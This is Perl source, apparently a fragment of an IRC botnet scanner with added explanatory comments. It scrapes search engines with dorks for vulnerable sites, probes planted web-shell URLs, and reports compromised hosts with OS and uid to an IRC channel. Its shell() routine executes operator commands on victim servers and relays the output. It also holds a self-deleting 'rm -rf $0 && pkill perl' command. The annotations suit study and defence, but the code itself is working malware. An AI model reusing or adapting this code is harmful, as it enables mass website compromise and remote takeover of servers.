- my $vuln4 = "http://".$site.$tpath.$folder3;
- my $vuln5 = "http://".$site.$tpath.$folder4;
- my $vuln6 = "http://".$site.$folder5;
- my $exbot1 = "http://".$site.$tpath.$bot1;
- my $exbot2 = "http://".$site.$tpath.$bot2;
- my $exbot3 = "http://".$site.$tpath.$bot3;
- my $exbot4 = "http://".$site.$tpath.$bot4;
- my $exbot5 = "http://".$site.$bot5;
- my $runbot1 = &get_content($exbot1);sleep(3);
- my $runbot2 = &get_content($exbot2);sleep(3);
- my $runbot3 = &get_content($exbot3);sleep(3);
- my $runbot4 = &get_content($exbot4);sleep(2);
- my $runbot5 = &get_content($exbot5);sleep(2);
- my $backup = &get_content($runing);sleep(3);
- my $check1 = &get_content($vuln2);sleep(2);
- my $check2 = &get_content($vuln3);sleep(2);
- my $check3 = &get_content($vuln4);sleep(2);
- my $check4 = &get_content($vuln5);sleep(2);
- my $check5 = &get_content($vuln6);sleep(2);
- my $os = "";
- my $free = "";
- my $uid = "";
# The five blocks below are identical apart from which response and URL
# they use.
- if ($check1 =~ /JANCOK- exploit/i) {
- if ($check1 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check1 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
- if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln2."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln2."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- }
- if ($check2 =~ /JANCOK- exploit/i) {
- if ($check2 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check2 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
- if ($check2 =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln3."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln3."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- }
- if ($check3 =~ /JANCOK- exploit/i) {
- if ($check3 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check3 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
- if ($check3 =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln4."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln4."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- }
- if ($check4 =~ /JANCOK- exploit/i) {
- if ($check4 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check4 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
- if ($check4 =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln5."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln5."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- }
- if ($check5 =~ /JANCOK- exploit/i) {
- if ($check5 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check5 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
- if ($check5 =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln6."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln6."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
- }
- }
- }
- }
- }
- #########################################
# Runs the scraper for one search engine and returns the de-duplicated list
# of candidate hosts/paths.
# Arguments: channel, path suffix (unused here), search term, engine name
# (compared exactly, case-sensitive), message prefix. Raw and de-duplicated
# counts are posted to the channel before the list is returned.
- sub search_engine() {
- my (@total,@clean);
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $logo = $_[4];
- if ($engine eq "GooGLe") { my @google = google($dork); push(@total,@google); }
- if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); }
- if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); }
- if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); }
- if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); }
- if ($engine eq "UoL") { my @uol = uol($dork); push(@total,@uol); }
- if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); }
- @clean = clean(@total);
- &msg("$chan","$logo15(9@2$engine15) Total:14 (".scalar(@total).") Clean:14 (".scalar(@clean).")");
- return @clean;
- }
- #########################################
# Returns 1 if the body fetched from $link matches $reqexp, else 0.
# $reqexp is interpolated into the pattern as-is, so it is treated as a
# regular expression rather than a literal string.
- sub isFound() {
- my $status = 0;
- my $link = $_[0];
- my $reqexp = $_[1];
- my $res = &get_content($link);
- if ($res =~ /$reqexp/) { $status = 1 }
- return $status;
- }
# Fetches a URL with LWP::UserAgent and returns the response content.
# Uses the fixed User-Agent in $uagent and a 7-second timeout. The HTTP
# status is not checked, so the content of an error response is returned
# like any other. All probe requests in thumb(), sql() and lfi() go through
# here, which makes the User-Agent string a useful log filter.
- sub get_content() {
- my $url = $_[0];
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout(7);
- my $req = HTTP::Request->new(GET => $url);
- my $res = $ua->request($req);
- return $res->content;
- }
- ######################################### SEARCH ENGINE gibla
# Scrapes Google result pages for the search term in $_[0].
# Walks result offsets 0..1000 in steps of 100, pulls "http://" link targets
# out of the HTML, skips any that contain "google", and expands each hit via
# links(). Returns the flat list; duplicates are left for clean().
- sub google() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=100){
- my $search = ("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$i);
- my $res = search_engine_query($search);
- while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
- my $link = $1;
- if ($link !~ /google/){
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# Scrapes the Yahoo-hosted AllTheWeb result pages for the search term.
# Walks offsets 0..1000 in steps of 100, extracts URL-encoded link targets,
# skips those containing "bingj" or "yahoo", strips spaces, decodes "%3f" to
# "?", and expands each hit via links().
- sub alltheweb() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=100) {
- my $search = ("http://us.yhs4.search.yahoo.com/yhs/search?fr=alltheweb&cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
- my $res = search_engine_query($search);
- while ($res =~ m/\*\*http%3a\/\/(.+?)\">/g) {
- my $link = $1;
- if ($link !~ /bingj|yahoo/) {
- $link =~ s/ //g;
- $link =~ s/%3f/\?/g;
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# Scrapes UOL search result pages for the search term.
# Walks offsets 1..1000 in steps of 10, extracts "http://" link targets,
# skips those containing "busca", "uol" or "yahoo", and expands each hit via
# links().
- sub uol() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=1000; $i+=10) {
- my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$i);
- my $res = search_engine_query($search);
- while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
- my $link = $1;
- if ($link !~ /busca|uol|yahoo/) {
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# Scrapes Bing result pages for the search term.
# Walks offsets 1..1000 in steps of 10, extracts "http://" link targets,
# skips those containing "msn", "live" or "bing", and expands each hit via
# links().
- sub bing() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=1000; $i+=10) {
- my $search = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$i."&FORM=PERE");
- my $res = search_engine_query($search);
- while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
- my $link = $1;
- if ($link !~ /msn|live|bing/) {
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# Scrapes AltaVista result pages for the search term.
# Walks offsets 1..1000 in steps of 10, takes the text of each
# <span class=ngrn> element up to the first "/", skips entries containing
# "altavista", strips "<" and spaces, and expands each hit via links().
- sub altavista() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=1000; $i+=10){
- my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$i);
- my $res = search_engine_query($search);
- while ($res =~ m/<span class=ngrn>(.+?)\//g) {
- my $link = $1;
- if ($link !~ /altavista/){
- $link =~ s/<//g;
- $link =~ s/ //g;
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# Scrapes Ask.com result pages for the search term.
# Walks page values 0..1000 in steps of 10, extracts link targets that are
# followed by an onmousedown attribute, skips those containing "ask.com",
# and expands each hit via links().
- sub ask() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=10) {
- my $search = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$i);
- my $res = search_engine_query($search);
- while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
- my $link = $1;
- if ($link !~ /ask\.com/){
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# Scrapes Yahoo result pages for the search term.
# Walks offsets 1..500 one at a time (500 requests per call), extracts the
# target between "26u=" and "%26w=" in redirect links, skips those containing
# "yahoo", and expands each hit via links().
- sub yahoo() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=500; $i+=1) {
- my $search = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$i);
- my $res = search_engine_query($search);
- while ($res =~ m/26u=(.*?)%26w=/g) {
- my $link = $1;
- if ($link!~ /yahoo/){
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- #########################################
# Returns the arguments with runs of "/" collapsed to one and duplicates
# removed, keeping first-seen order.
# The loop variable aliases @_, so the slash collapsing also rewrites the
# caller's array elements in place.
- sub clean() {
- my @cln = ();
- my %visit = ();
- foreach my $element (@_) {
- $element =~ s/\/+/\//g;
- next if $visit{$element}++;
- push @cln, $element;
- }
- return @cln;
- }
# Hand-rolled URL encoding of a search term for use in a query string.
# Spaces become "+" and a fixed set of punctuation characters is replaced by
# its percent-escape; every other character, including "%" itself, passes
# through unchanged. The "?" substitution appears twice; the second is a no-op.
- sub key() {
- my $dork = $_[0];
- $dork =~ s/ /\+/g;
- $dork =~ s/:/\%3A/g;
- $dork =~ s/\//\%2F/g;
- $dork =~ s/\?/\%3F/g;
- $dork =~ s/&/\%26/g;
- $dork =~ s/\"/\%22/g;
- $dork =~ s/,/\%2C/g;
- $dork =~ s/\\/\%5C/g;
- $dork =~ s/@/\%40/g;
- $dork =~ s/\[/\%5B/g;
- $dork =~ s/\]/\%5D/g;
- $dork =~ s/\?/\%3F/g;
- $dork =~ s/\=/\%3D/g;
- $dork =~ s/\|/\%7C/g;
- return $dork;
- }
# Expands one scraped link (without scheme) into three candidates, each with
# a trailing "/" and with "//" collapsed to "/": the link itself, its host
# part, and the link with its last path component removed.
# Returned in that order: ($link, $host, $hdir).
- sub links() {
- my @list;
- my $link = $_[0];
- my $host = $_[0];
- my $hdir = $_[0];
- $hdir =~ s/(.*)\/[^\/]*$/$1/;
- $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
- $host .= "/";
- $link .= "/";
- $hdir .= "/";
- $host =~ s/\/\//\//g;
- $hdir =~ s/\/\//\//g;
- $link =~ s/\/\//\//g;
- push(@list,$link,$host,$hdir);
- return @list;
- }
# Fetches one search-result page over a raw socket and returns everything
# read from it (status line and headers included), or "" on failure.
# The URL is split into host and request path by regex; the request is a
# plain HTTP/1.0 GET to port 80 with the bot's fixed User-Agent. The host is
# interpolated into a pattern unescaped when it is stripped from the path.
# "or return" inside eval only leaves the eval block, so a failed connect
# falls through to the final return with $page still empty. "@pages" joins
# the lines read with a space.
- sub search_engine_query($) {
- my $url = $_[0];
- $url =~ s/http:\/\///;
- my $host = $url;
- my $query = $url;
- my $page = "";
- $host =~ s/href=\"?http:\/\///;
- $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
- $query =~ s/$host//;
- if ($query eq "") { $query = "/"; }
- eval {
- my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
- print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
- my @pages = <$sock>;
- $page = "@pages";
- close($sock);
- };
- return $page;
- }
- #########################################
# Remote command execution: runs an operator-supplied command line and
# relays its output to IRC.
# Arguments: reply target (nick or channel) and command text.
#   - If the text contains "cd <dir>" anywhere, only chdir() is performed in
#     the bot process and nothing is executed.
#   - Otherwise a double-forked grandchild runs the text through backticks
#     (i.e. through the shell) with stderr merged in, and sends the output
#     back five lines at a time with a 2-second pause between batches.
# chop removes the last character of each line whether or not it is a newline.
# Defender view: commands run with the privileges of the compromised web
# account; child processes of a perl process that carries a fake $0 are the
# host-side trace.
- sub shell() {
- my $path = $_[0];
- my $cmd = $_[1];
- if ($cmd =~ /cd (.*)/) {
- chdir("$1") || &msg("$path","4No such file or directory");
- return;
- }
- elsif ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- my @output = `$cmd 2>&1 3>&1`;
- my $c = 0;
- foreach my $output (@output) {
- $c++;
- chop $output;
- &msg("$path","$output");
- if ($c == 5) { $c = 0; sleep 2; }
- }
- exit;
- }}
- }
# Returns 1 if $_[0] equals the configured operator nick ($admin), else 0.
# This exact, case-sensitive nickname comparison is the only authorisation
# check in the script: no hostmask, ident or password is involved.
- sub isAdmin() {
- my $status = 0;
- my $nick = $_[0];
- if ($nick eq $admin) { $status = 1; }
- return $status;
- }
# Sends "PRIVMSG <target> :<text>" on the current IRC socket.
# Does nothing unless called with exactly two arguments. It is declared with
# an empty prototype but is called as &msg(...), which bypasses prototype
# checking.
- sub msg() {
- return unless $#_ == 1;
- sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
- }
# Tamper check on the $powered and $mail values set at the top of the script.
# If $powered contains no "t" or $mail does not contain "bot", it prints a
# taunt and replaces the process with a shell command that deletes the script
# file ($0) and kills perl processes.
# No call to SIGN() appears in the visible source. Note that $0 is
# overwritten with the fake process name during start-up.
- sub SIGN() {
- if (($powered !~ /t/)||($mail !~ /bot/)) {
- print "\nLAMER DETECTED FVCK YOU. YOU NOT HACKER. U JUST SCRIPT KIDDIES\n\n";
- exec("rm -rf $0 && pkill perl");
- }
- }
# Sends "NICK <name>" on the current IRC socket.
# Does nothing unless called with exactly one argument.
- sub nick() {
- return unless $#_ == 0;
- sendraw("NICK $_[0]");
- }
# Sends "NOTICE <target> :<text>" on the current IRC socket.
# Does nothing unless called with exactly two arguments.
- sub notice() {
- return unless $#_ == 1;
- sendraw("NOTICE $_[0] :$_[1]");
- }